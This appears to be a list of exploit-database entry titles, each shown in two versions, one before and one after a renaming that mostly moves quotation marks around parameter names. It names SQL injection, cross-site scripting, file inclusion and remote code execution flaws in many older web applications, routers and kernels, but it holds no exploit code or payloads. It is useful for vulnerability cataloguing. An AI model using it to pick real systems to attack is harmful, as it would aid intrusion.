GoAhead Web Server 2.18 - 'addgroup.asp group' Parameter Cross-Site Scripting
GoAhead Web Server 2.18 - 'addlimit.asp url' Parameter Cross-Site Scripting

Linux Kernel 3.0.5 - 'ath9k_htc_set_bssid_mask()' Function Information Disclosure
Linux Kernel 3.0.5 - 'ath9k_htc_set_bssid_mask()' Information Disclosure
Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi' 'ping_ipaddr' Parameter Remote Code Execution
VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Function Stack Buffer Overflow
Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi ping_ipaddr' Parameter Remote Code Execution
VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Stack Buffer Overflow

NETGEAR D6300B - '/diag.cgi' 'IPAddr4' Parameter Remote Command Execution
NETGEAR D6300B - '/diag.cgi IPAddr4' Parameter Remote Command Execution

lxml - 'clean_html' Function Security Bypass
lxml - 'clean_html' Security Bypass
Alfresco - '/proxy' 'endpoint' Parameter Server-Side Request Forgery
Alfresco - '/cmisbrowser' 'url' Parameter Server-Side Request Forgery
Alfresco - '/proxy endpoint' Parameter Server-Side Request Forgery
Alfresco - '/cmisbrowser url' Parameter Server-Side Request Forgery

Laravel - 'Hash::make()' Function Password Truncation Security
Laravel - 'Hash::make()' Password Truncation Security

OrientDB 2.2.2 - 2.2.22 - Remote Code Execution (Metasploit)
OrientDB 2.2.2 < 2.2.22 - Remote Code Execution (Metasploit)

Windows - (DCOM RPC2) Universal Shellcode
Windows - DCOM RPC2 Universal Shellcode

Linux/CRISv32 - Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes)
Linux/CRISv32 Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes)

Cyphor 0.19 - (board takeover) SQL Injection
Cyphor 0.19 - Board Takeover SQL Injection

PHPay 2.02 - 'nu_mail.inc.php' 'mail()' Remote Injection
PHPay 2.02 - 'nu_mail.inc.php mail()' Remote Injection

PHPMyNews 1.4 - (cfg_include_dir) Remote File Inclusion
PHPMyNews 1.4 - 'cfg_include_dir' Remote File Inclusion

Flatnuke 2.5.8 - (userlang) Local Inclusion / Delete All Users Exploit
Flatnuke 2.5.8 - 'userlang' Local Inclusion / Delete All Users Exploit

Yrch 1.0 - 'plug.inc.php' 'path' Parameter Remote File Inclusion
Yrch 1.0 - 'plug.inc.phppath' Parameter Remote File Inclusion

Cacti 0.8.6i - 'cmd.php' 'popen()' Remote Injection
Cacti 0.8.6i - 'cmd.php popen()' Remote Injection

Vizayn Haber - 'haberdetay.asp' 'id' Parameter SQL Injection
Vizayn Haber - 'haberdetay.asp id' Parameter SQL Injection

iG Calendar 1.0 - 'user.php' 'id' Parameter SQL Injection
iG Calendar 1.0 - 'user.php id' Parameter SQL Injection

MGB 0.5.4.5 - 'email.php' 'id' Parameter SQL Injection
MGB 0.5.4.5 - 'email.php id' Parameter SQL Injection

Original 0.11 - 'config.inc.php' 'x[1]' Remote File Inclusion
Original 0.11 - 'config.inc.php x[1]' Remote File Inclusion

Picturesolution 2.1 - 'config.php' 'path' Remote File Inclusion
Picturesolution 2.1 - 'config.php path' Remote File Inclusion

PHP Homepage M 1.0 - galerie.php SQL Injection
PHP Homepage M 1.0 - 'galerie.php' SQL Injection

cpDynaLinks 1.02 - category.php SQL Injection
cpDynaLinks 1.02 - 'category.php' SQL Injection

DFF PHP Framework API (Data Feed File) - Remote File Inclusion
DFF PHP Framework API - 'Data Feed File' Remote File Inclusion

WebBiscuits Modules Controller 1.1 - Remote File Inclusion / RFD
WebBiscuits Modules Controller 1.1 - Remote File Inclusion / Remote File Disclosure

dMx READY (25 - Products) - Remote Database Disclosure
dMx READ - Remote Database Disclosure

Access2asp - imageLibrary - Arbitrary File Upload
Access2asp - 'imageLibrar' Arbitrary File Upload

Auktionshaus 3.0.0.1 - 'news.php' 'id' SQL Injection
Auktionshaus 3.0.0.1 - 'news.php id' SQL Injection

Bild Flirt System 2.0 - 'index.php' 'id' SQL Injection
Bild Flirt System 2.0 - 'index.php id' SQL Injection

Fast Free Media 1.3 - Adult Site - Arbitrary File Upload
Fast Free Media 1.3 Adult Site - Arbitrary File Upload

goffgrafix - Design's - SQL Injection
goffgrafix Design's - SQL Injection

Bilder Upload Script - Datei Upload 1.09 - Arbitrary File Upload
Bilder Upload Script Datei Upload 1.09 - Arbitrary File Upload
Allomani - E-Store 1.0 - Cross-Site Request Forgery (Add Admin)
Allomani - Super MultiMedia 2.5 - Cross-Site Request Forgery (Add Admin)
Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin)
Allomani Super MultiMedia 2.5 - Cross-Site Request Forgery (Add Admin)

E-Xoopport - Samsara 3.1 (Sections Module) - Blind SQL Injection
E-Xoopport Samsara 3.1 (Sections Module) - Blind SQL Injection

E-Xoopport - Samsara 3.1 (eCal Module) - Blind SQL Injection
E-Xoopport Samsara 3.1 (eCal Module) - Blind SQL Injection

WordPress 3.0.1 - 'do_trackbacks()' function SQL Injection
WordPress 3.0.1 - 'do_trackbacks()' SQL Injection

Oracle WebLogic - Session Fixation Via HTTP POST
Oracle WebLogic - POST Session Fixation

spidaNews 1.0 - 'news.php' 'id' SQL Injection
spidaNews 1.0 - 'news.php id' SQL Injection

Catalog Builder - eCommerce Software - Blind SQL Injection
Catalog Builder eCommerce Software - Blind SQL Injection

FileBox - File Hosting & Sharing Script 1.5 - SQL Injection
FileBox File Hosting & Sharing Script 1.5 - SQL Injection

Snortreport - nmap.php and nbtscan.php Remote Command Execution (Metasploit)
Snortreport - 'nmap.php' / 'nbtscan.php' Remote Command Execution (Metasploit)

jbShop - e107 7 CMS Plugin - SQL Injection
jbShop e107 7 CMS Plugin - SQL Injection

Tine 2.0 - Maischa - Multiple Cross-Site Scripting Vulnerabilities
Tine 2.0 - Maischa Multiple Cross-Site Scripting Vulnerabilities

4Images - Image Gallery Management System - Cross-Site Request Forgery
4Images Image Gallery Management System - Cross-Site Request Forgery

PHP Ticket System Beta 1 - 'index.php' 'p' Parameter SQL Injection
PHP Ticket System Beta 1 - 'index.php p' Parameter SQL Injection

X-Cart Gold 4.5 - 'products_map.php' 'symb' Parameter Cross-Site Scripting
X-Cart Gold 4.5 - 'products_map.php symb' Parameter Cross-Site Scripting

Symantec Web Gateway 5.0.2 - 'blocked.php' 'id' Parameter Blind SQL Injection
Symantec Web Gateway 5.0.2 - 'blocked.php id' Parameter Blind SQL Injection

Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php' 'groupid' Parameter Blind SQL Injection
Symantec Web Gateway 5.0.3.18 - 'deptUploads_data.php groupid' Parameter Blind SQL Injection

YourArcadeScript 2.4 - 'index.php' 'id' Parameter SQL Injection
YourArcadeScript 2.4 - 'index.php id' Parameter SQL Injection

AV Arcade Free Edition - 'add_rating.php' 'id' Parameter Blind SQL Injection
AV Arcade Free Edition - 'add_rating.php id' Parameter Blind SQL Injection

PhpTax - pfilez Parameter Exec Remote Code Injection (Metasploit)
PhpTax - 'pfilez' Parameter Exec Remote Code Injection (Metasploit)

phpMyAdmin 3.5.2.2 - server_sync.php Backdoor (Metasploit)
phpMyAdmin 3.5.2.2 - 'server_sync.php' Backdoor (Metasploit)

Blog Mod 0.1.9 - 'index.php' 'month' Parameter SQL Injection
Blog Mod 0.1.9 - 'index.php month' Parameter SQL Injection

SurfControl SuperScout Email Filter 3.5 - MsgError.asp Cross-Site Scripting
SurfControl SuperScout Email Filter 3.5 - 'MsgError.asp' Cross-Site Scripting

PHPReactor 1.2.7 pl1 - browse.php Cross-Site Scripting
PHPReactor 1.2.7 pl1 - 'browse.php' Cross-Site Scripting

PHPRank 1.8 - add.php Cross-Site Scripting
PHPRank 1.8 - 'add.php' Cross-Site Scripting

MyBB Profile Albums Plugin 0.9 - 'albums.php' 'album' Parameter SQL Injection
MyBB Profile Albums Plugin 0.9 - 'albums.php album' Parameter SQL Injection
M-TECH P-Synch 6.2.5 - 'nph-psf.exe' 'css' Parameter Remote File Inclusion
M-TECH P-Synch 6.2.5 - 'nph-psa.exe' 'css' Parameter Remote File Inclusion
M-TECH P-Synch 6.2.5 - 'nph-psf.exe css' Parameter Remote File Inclusion
M-TECH P-Synch 6.2.5 - 'nph-psa.exe css' Parameter Remote File Inclusion

friendsinwar FAQ Manager - 'view_faq.php' 'question' Parameter SQL Injection
friendsinwar FAQ Manager - 'view_faq.php question' Parameter SQL Injection

SmartCMS - 'index.php' 'idx' Parameter SQL Injection
SmartCMS - 'index.php idx' Parameter SQL Injection

SmartCMS - 'index.php' 'menuitem' Parameter SQL Injection / Cross-Site Scripting
SmartCMS - 'index.php menuitem' Parameter SQL Injection / Cross-Site Scripting

PHP-Nuke 6.6 - admin.php SQL Injection
PHP-Nuke 6.6 - 'admin.php' SQL Injection

MyBB AwayList Plugin - 'index.php' 'id' Parameter SQL Injection
MyBB AwayList Plugin - 'index.php id' Parameter SQL Injection

WarpSpeed 4nAlbum Module 0.92 - 'displaycategory.php' 'basepath' Parameter Remote File Inclusion
WarpSpeed 4nAlbum Module 0.92 - 'displaycategory.php basepath' Parameter Remote File Inclusion

PHP-Nuke Error Manager Module 2.1 - 'error.php' 'language' Parameter Full Path Disclosure
PHP-Nuke Error Manager Module 2.1 - 'error.php language' Parameter Full Path Disclosure

phpHeaven phpMyChat 0.14.5 - 'edituser.php3' 'do_not_login' Parameter Authentication Bypass
phpHeaven phpMyChat 0.14.5 - 'edituser.php3 do_not_login' Parameter Authentication Bypass

NConf 1.3 - 'detail.php' 'detail_admin_items.php' 'id' Parameter SQL Injection
NConf 1.3 - 'detail.php detail_admin_items.php id' Parameter SQL Injection

AdaptCMS 2.0.4 - 'config.php' 'question' Parameter SQL Injection
AdaptCMS 2.0.4 - 'config.php question' Parameter SQL Injection

Scripts Genie Domain Trader - 'catalog.php' 'id' Parameter SQL Injection
Scripts Genie Domain Trader - 'catalog.php id' Parameter SQL Injection

Scripts Genie Games Site Script - 'index.php' 'id' Parameter SQL Injection
Scripts Genie Games Site Script - 'index.php id' Parameter SQL Injection

Scripts Genie Top Sites - 'out.php' 'id' Parameter SQL Injection
Scripts Genie Top Sites - 'out.php id' Parameter SQL Injection

Scripts Genie Hot Scripts Clone - 'showcategory.php' 'cid' Parameter SQL Injection
Scripts Genie Hot Scripts Clone - 'showcategory.php cid' Parameter SQL Injection

PHPMyRecipes 1.2.2 - 'viewrecipe.php' 'r_id' Parameter SQL Injection
PHPMyRecipes 1.2.2 - 'viewrecipe.php r_id' Parameter SQL Injection

MTP Image Gallery 1.0 - 'edit_photos.php' 'title' Parameter Cross-Site Scripting
MTP Image Gallery 1.0 - 'edit_photos.php title' Parameter Cross-Site Scripting
DCP-Portal 3.7/4.x/5.x - 'announcement.php' 'cid' Parameter Cross-Site Scripting
DCP-Portal 3.7/4.x/5.x - 'news.php' 'cid' Parameter Cross-Site Scripting
DCP-Portal 3.7/4.x/5.x - 'contents.php' 'cid' Parameter Cross-Site Scripting
DCP-Portal 3.7/4.x/5.x - 'announcement.php cid' Parameter Cross-Site Scripting
DCP-Portal 3.7/4.x/5.x - 'news.php cid' Parameter Cross-Site Scripting
DCP-Portal 3.7/4.x/5.x - 'contents.php cid' Parameter Cross-Site Scripting
UBBCentral UBB.Threads 6.2.3/6.5 - 'showflat.php' 'Cat' Parameter Cross-Site Scripting
UBBCentral UBB.Threads 6.2.3/6.5 - 'calendar.php' 'Cat' Parameter Cross-Site Scripting
UBBCentral UBB.Threads 6.2.3/6.5 - 'login.php' 'Cat' Parameter Cross-Site Scripting
UBBCentral UBB.Threads 6.2.3/6.5 - 'online.php' 'Cat' Parameter Cross-Site Scripting
UBBCentral UBB.Threads 6.2.3/6.5 - 'showflat.php Cat' Parameter Cross-Site Scripting
UBBCentral UBB.Threads 6.2.3/6.5 - 'calendar.php Cat' Parameter Cross-Site Scripting
UBBCentral UBB.Threads 6.2.3/6.5 - 'login.php Cat' Parameter Cross-Site Scripting
UBBCentral UBB.Threads 6.2.3/6.5 - 'online.php Cat' Parameter Cross-Site Scripting

PHPGedView 2.5/2.6 - 'login.php' 'Username' Parameter Cross-Site Scripting
PHPGedView 2.5/2.6 - 'login.php Username' Parameter Cross-Site Scripting

Rebus:list - 'list.php' 'list_id' Parameter SQL Injection
Rebus:list - 'list.php list_id' Parameter SQL Injection

SynConnect Pms - 'index.php' 'loginid' Parameter SQL Injection
SynConnect Pms - 'index.php loginid' Parameter SQL Injection
AWS Xms 2.5 - 'importer.php' 'what' Parameter Directory Traversal
Pollen CMS 0.6 - 'index.php' 'p' Paramete' Local File Disclosure
AWS Xms 2.5 - 'importer.php what' Parameter Directory Traversal
Pollen CMS 0.6 - 'index.php p' Paramete' Local File Disclosure

WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php' 'hash Parameter SQL Injection
WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php hash' Parameter SQL Injection
CubeCart 2.0.x - 'tellafriend.php' 'product' Parameter Full Path Disclosure
CubeCart 2.0.x - 'view_cart.php' 'add' Parameter Full Path Disclosure
CubeCart 2.0.x - 'view_product.php' 'product' Parameter Full Path Disclosure
CubeCart 2.0.x - 'tellafriend.php product' Parameter Full Path Disclosure
CubeCart 2.0.x - 'view_cart.php add' Parameter Full Path Disclosure
CubeCart 2.0.x - 'view_product.php product' Parameter Full Path Disclosure

WHMCS 4.x - 'invoicefunctions.php' 'id' Parameter SQL Injection
WHMCS 4.x - 'invoicefunctions.php id' Parameter SQL Injection

AVE.CMS 2.09 - 'index.php' 'module' Parameter Blind SQL Injection
AVE.CMS 2.09 - 'index.php module' Parameter Blind SQL Injection

RadioCMS 2.2 - 'menager.php' 'playlist_id' Parameter SQL Injection
RadioCMS 2.2 - 'menager.php playlist_id' Parameter SQL Injection

SPIP - CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation
SPIP CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation

FlatNuke 2.5.x - 'index.php' 'where' Parameter Full Path Disclosure
FlatNuke 2.5.x - 'index.php where' Parameter Full Path Disclosure

UBBCentral UBB.Threads 5.5.1/6.x - 'download.php' 'Number' Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'download.php Number' Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php' 'Number' Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php' 'message' Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php' 'main' Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php' 'Number' Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php' 'posted' Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php Number' Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php message' Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php main' Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php Number' Parameter SQL Injection
UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php posted' Parameter SQL Injection

osTicket 1.2/1.3 - 'view.php' 'inc' Parameter Arbitrary Local File Inclusion
osTicket 1.2/1.3 - 'view.php inc' Parameter Arbitrary Local File Inclusion
Ruubikcms 1.1.1 - 'tinybrowser.php' 'folder' Parameter Directory Traversal
DS3 - Authentication Server - Multiple Vulnerabilities
Ruubikcms 1.1.1 - 'tinybrowser.php folder' Parameter Directory Traversal
DS3 Authentication Server - Multiple Vulnerabilities

Kayako LiveResponse 2.0 - 'index.php' 'Username' Parameter Cross-Site Scripting
Kayako LiveResponse 2.0 - 'index.php Username' Parameter Cross-Site Scripting

Utopia News Pro 1.1.3 - 'header.php' 'sitetitle' Parameter Cross-Site Scripting
Utopia News Pro 1.1.3 - 'header.php sitetitle' Parameter Cross-Site Scripting

Simple PHP Agenda 2.2.8 - 'edit_event.php' 'eventid' Parameter SQL Injection
Simple PHP Agenda 2.2.8 - 'edit_event.php eventid' Parameter SQL Injection
Aenovo - '/Password/default.asp' Password Field SQL Injection
Aenovo - '/incs/searchdisplay.asp' strSQL Parameter SQL Injection
Aenovo - '/Password/default.asp Password' SQL Injection
Aenovo - '/incs/searchdisplay.asp strSQL' Parameter SQL Injection
vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertitle.php' 'usertitleid' Parameter SQL Injection
vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertools.php' 'ids' Parameter SQL Injection
vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertitle.php usertitleid' Parameter SQL Injection
vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertools.php ids' Parameter SQL Injection

vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/css.php' 'group' Parameter Cross-Site Scripting
vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/css.php group' Parameter Cross-Site Scripting
vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php' 'email' Parameter Cross-Site Scripting
vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/language.php' 'goto' Parameter Cross-Site Scripting
vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/modlog.php' 'orderby' Parameter Cross-Site Scripting
vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php email' Parameter Cross-Site Scripting
vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/language.php goto' Parameter Cross-Site Scripting
vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/modlog.php orderby' Parameter Cross-Site Scripting
Cyphor 0.19 - lostpwd.php nick Field SQL Injection
Cyphor 0.19 - 'newmsg.php' fid Parameter SQL Injection
Cyphor 0.19 - footer.php t_login Parameter Cross-Site Scripting
Cyphor 0.19 - 'lostpwd.php nick' SQL Injection
Cyphor 0.19 - 'newmsg.php fid' Parameter SQL Injection
Cyphor 0.19 - 'footer.php t_login' Parameter Cross-Site Scripting
MySource 2.14 - 'Socket.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Request.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Socket.php PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Request.php PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'mail.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Date.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Span.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'mimeDecode.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'mime.php' 'PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'mail.php PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Date.php PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'Span.php PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'mimeDecode.php PEAR_PATH' Remote File Inclusion
MySource 2.14 - 'mime.php PEAR_PATH' Remote File Inclusion

Top Games Script 1.2 - 'play.php' 'gid' Parameter SQL Injection
Top Games Script 1.2 - 'play.php gid' Parameter SQL Injection

Elemata CMS RC3.0 - 'global.php' 'id' Parameter SQL Injection
Elemata CMS RC3.0 - 'global.php id' Parameter SQL Injection

PHP-Charts 1.0 - 'index.php' 'type' Parameter Remote Code Execution
PHP-Charts 1.0 - 'index.php type' Parameter Remote Code Execution
PHPList Mailing List Manager 2.x - '/admin/admin.php' 'id' Parameter SQL Injection
PHPList Mailing List Manager 2.x - '/admin/editattributes.php' 'id' Parameter SQL Injection
PHPList Mailing List Manager 2.x - '/admin/admin.php id' Parameter SQL Injection
PHPList Mailing List Manager 2.x - '/admin/editattributes.php id' Parameter SQL Injection
PHPList Mailing List Manager 2.x - '/admin/configure.php' 'id' Parameter Cross-Site Scripting
PHPList Mailing List Manager 2.x - '/admin/users.php' 'find' Parameter Cross-Site Scripting
PHPList Mailing List Manager 2.x - '/admin/configure.php id' Parameter Cross-Site Scripting
PHPList Mailing List Manager 2.x - '/admin/users.php find' Parameter Cross-Site Scripting
Walla TeleSite 3.0 - 'ts.exe' 'tsurl' Parameter Arbitrary Article Access
Walla TeleSite 3.0 - 'ts.exe' 'sug' Parameter Cross-Site Scripting
Walla TeleSite 3.0 - 'ts.exe' 'sug' Parameter SQL Injection
Walla TeleSite 3.0 - 'ts.exe tsurl' Parameter Arbitrary Article Access
Walla TeleSite 3.0 - 'ts.exe sug' Parameter Cross-Site Scripting
Walla TeleSite 3.0 - 'ts.exe sug' Parameter SQL Injection

GLPI 0.83.9 - 'Unserialize()' Function Remote Code Execution
GLPI 0.83.9 - 'Unserialize()' Remote Code Execution

Binary Board System 0.2.5 - 'toc.pl' 'board' Parameter Cross-Site Scripting
Binary Board System 0.2.5 - 'toc.pl board' Parameter Cross-Site Scripting

Cerberus Helpdesk 2.649 - 'cer_KnowledgebaseHandler.class.php' '_load_article_details' Function SQL Injection
Cerberus Helpdesk 2.649 - 'cer_KnowledgebaseHandler.class.php _load_article_details' SQL Injection
IceWarp Universal WebMail - '/dir/include.html' 'lang' Parameter Local File Inclusion
IceWarp Universal WebMail - '/mail/settings.html' 'Language' Parameter Local File Inclusion
IceWarp Universal WebMail - '/mail/index.html' 'lang_settings' Parameter Remote File Inclusion
IceWarp Universal WebMail - '/dir/include.html lang' Parameter Local File Inclusion
IceWarp Universal WebMail - '/mail/settings.html Language' Parameter Local File Inclusion
IceWarp Universal WebMail - '/mail/index.html lang_settings' Parameter Remote File Inclusion
OnePlug CMS - '/press/details.asp' 'Press_Release_ID' Parameter SQL Injection
OnePlug CMS - '/services/details.asp' 'Service_ID' Parameter SQL Injection
OnePlug CMS - '/products/details.asp' 'Product_ID' Parameter SQL Injection
OnePlug CMS - '/press/details.asp Press_Release_ID' Parameter SQL Injection
OnePlug CMS - '/services/details.asp Service_ID' Parameter SQL Injection
OnePlug CMS - '/products/details.asp Product_ID' Parameter SQL Injection

aoblogger 2.3 - 'login.php' 'Username' Field SQL Injection
aoblogger 2.3 - 'login.php Username' SQL Injection
HiveMail 1.2.2/1.3 - 'addressbook.update.php' 'contactgroupid' Parameter Arbitrary PHP Command Execution
HiveMail 1.2.2/1.3 - 'folders.update.php' 'folderid' Parameter Arbitrary PHP Command Execution
HiveMail 1.2.2/1.3 - 'addressbook.update.php contactgroupid' Parameter Arbitrary PHP Command Execution
HiveMail 1.2.2/1.3 - 'folders.update.php folderid' Parameter Arbitrary PHP Command Execution

ImageVue 0.16.1 - 'readfolder.php' 'path' Parameter Arbitrary Directory Listing
ImageVue 0.16.1 - 'readfolder.php path' Parameter Arbitrary Directory Listing

Virtual Hosting Control System 2.2/2.4 - 'login.php' 'check_login()' Function Authentication Bypass
Virtual Hosting Control System 2.2/2.4 - 'login.php check_login()' Authentication Bypass
dotProject 2.0 - '/modules/projects/gantt.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion
dotProject 2.0 - '/includes/db_connect.php' 'baseDir' Parameter Remote File Inclusion
dotProject 2.0 - '/includes/session.php' 'baseDir' Parameter Remote File Inclusion
dotProject 2.0 - '/modules/projects/gantt2.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion
dotProject 2.0 - '/modules/projects/vw_files.php' 'dPconfig[root_dir]' Parameter Remote File Inclusion
dotProject 2.0 - '/modules/admin/vw_usr_roles.php' 'baseDir' Parameter Remote File Inclusion
dotProject 2.0 - '/modules/public/calendar.php' 'baseDir' Parameter Remote File Inclusion
dotProject 2.0 - '/modules/public/date_format.php' 'baseDir' Parameter Remote File Inclusion
dotProject 2.0 - '/modules/tasks/gantt.php' 'baseDir' Parameter Remote File Inclusion
dotProject 2.0 - '/modules/projects/gantt.php dPconfig[root_dir]' Parameter Remote File Inclusion
dotProject 2.0 - '/includes/db_connect.php baseDir' Parameter Remote File Inclusion
dotProject 2.0 - '/includes/session.php baseDir' Parameter Remote File Inclusion
dotProject 2.0 - '/modules/projects/gantt2.php dPconfig[root_dir]' Parameter Remote File Inclusion
dotProject 2.0 - '/modules/projects/vw_files.php dPconfig[root_dir]' Parameter Remote File Inclusion
dotProject 2.0 - '/modules/admin/vw_usr_roles.php baseDir' Parameter Remote File Inclusion
dotProject 2.0 - '/modules/public/calendar.php baseDir' Parameter Remote File Inclusion
dotProject 2.0 - '/modules/public/date_format.php baseDir' Parameter Remote File Inclusion
dotProject 2.0 - '/modules/tasks/gantt.php baseDir' Parameter Remote File Inclusion

Ginkgo CMS - 'index.php' 'rang' Parameter SQL Injection
Ginkgo CMS - 'index.php rang' Parameter SQL Injection

Telmanik CMS Press 1.01b - 'pages.php' 'page_name' Parameter SQL Injection
Telmanik CMS Press 1.01b - 'pages.php page_name' Parameter SQL Injection

sBlog 0.7.2 - 'search.php' 'keyword' Parameter POST Method Cross-Site Scripting
sBlog 0.7.2 - 'search.php keyword' Parameter POST Method Cross-Site Scripting

MLMAuction Script - 'gallery.php' 'id' Parameter SQL Injection
MLMAuction Script - 'gallery.php id' Parameter SQL Injection

PHPMyForum 4.0 - 'index.php' 'type' Parameter CRLF Injection
PHPMyForum 4.0 - 'index.php type' Parameter CRLF Injection

321soft PHP-Gallery 0.9 - 'index.php' 'path' Parameter Arbitrary Directory Listing
321soft PHP-Gallery 0.9 - 'index.php path' Parameter Arbitrary Directory Listing
timobraun Dynamic Galerie 1.0 - 'index.php' 'pfad' Parameter Arbitrary Directory Listing
timobraun Dynamic Galerie 1.0 - 'galerie.php' 'pfad' Parameter Arbitrary Directory Listing
timobraun Dynamic Galerie 1.0 - 'index.php pfad' Parameter Arbitrary Directory Listing
timobraun Dynamic Galerie 1.0 - 'galerie.php pfad' Parameter Arbitrary Directory Listing

Gphotos 1.4/1.5 - 'index.php' 'rep' Parameter Traversal Arbitrary Directory Listing
Gphotos 1.4/1.5 - 'index.php rep' Parameter Traversal Arbitrary Directory Listing

Woltlab Burning Board FLVideo Addon - 'video.php' 'value' Parameter SQL Injection
Woltlab Burning Board FLVideo Addon - 'video.php value' Parameter SQL Injection

ATutor 1.5.x - 'admin/fix_content.php' 'submit' Parameter Cross-Site Scripting
ATutor 1.5.x - 'admin/fix_content.php submit' Parameter Cross-Site Scripting

glFusion 1.3.0 - 'search.php' 'cat_id' Parameter SQL Injection
glFusion 1.3.0 - 'search.php cat_id' Parameter SQL Injection

Geodesic Solutions Multiple Products - 'index.php' 'b' Parameter SQL Injection
Geodesic Solutions Multiple Products - 'index.php b' Parameter SQL Injection

RadScripts - 'a_editpage.php' 'Filename' Parameter Arbitrary File Overwrite
RadScripts - 'a_editpage.php Filename' Parameter Arbitrary File Overwrite

WoW Roster 1.5 - 'hsList.php' 'subdir' Parameter Remote File Inclusion
WoW Roster 1.5 - 'hsList.php subdir' Parameter Remote File Inclusion

Zen Cart Web Shopping Cart 1.x - 'autoload_func.php' 'autoLoadConfig[999][0][loadFile]' Parameter Remote File Inclusion
Zen Cart Web Shopping Cart 1.x - 'autoload_func.php autoLoadConfig[999][0][loadFile]' Parameter Remote File Inclusion

vTiger CRM 5.4.0 - 'index.php' 'onlyforuser' Parameter SQL Injection
vTiger CRM 5.4.0 - 'index.php onlyforuser' Parameter SQL Injection
osCommerce 2.2 - 'admin/orders_status.php' 'page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/products_attributes.php' 'page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/orders_status.php page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/products_attributes.php page' Parameter Cross-Site Scripting

DCP-Portal 6.0 - 'login.php' 'Username' Parameter SQL Injection
DCP-Portal 6.0 - 'login.php Username' Parameter SQL Injection

CubeCart 3.0.x - '/admin/print_order.php' 'order_id' Parameter Cross-Site Scripting
CubeCart 3.0.x - '/admin/print_order.php order_id' Parameter Cross-Site Scripting

CubeCart 3.0.x - '/admin/image.php' 'image' Parameter Cross-Site Scripting
CubeCart 3.0.x - '/admin/image.php image' Parameter Cross-Site Scripting

CubeCart 3.0.x - '/footer.inc.php' 'la_pow_by' Parameter Cross-Site Scripting
CubeCart 3.0.x - '/footer.inc.php la_pow_by' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/banner_manager.php' 'page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/banner_statistics.php' 'page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/countries.php' 'page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/currencies.php' 'page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/languages.php' 'page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/manufacturers.php' 'page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/products_expected.php' 'page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/reviews.php' 'page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/specials.php' 'page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/stats_products_purchased.php' 'page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/stats_products_viewed.php' 'page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/tax_classes.php' 'page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/tax_rates.php' 'page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/zones.php' 'page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/banner_manager.php page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/banner_statistics.php page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/countries.php page' Parameter Cross-Site Scripting
osCommerce 2.2 - 'admin/currencies.php page' Parameter Cross-Site Scripting
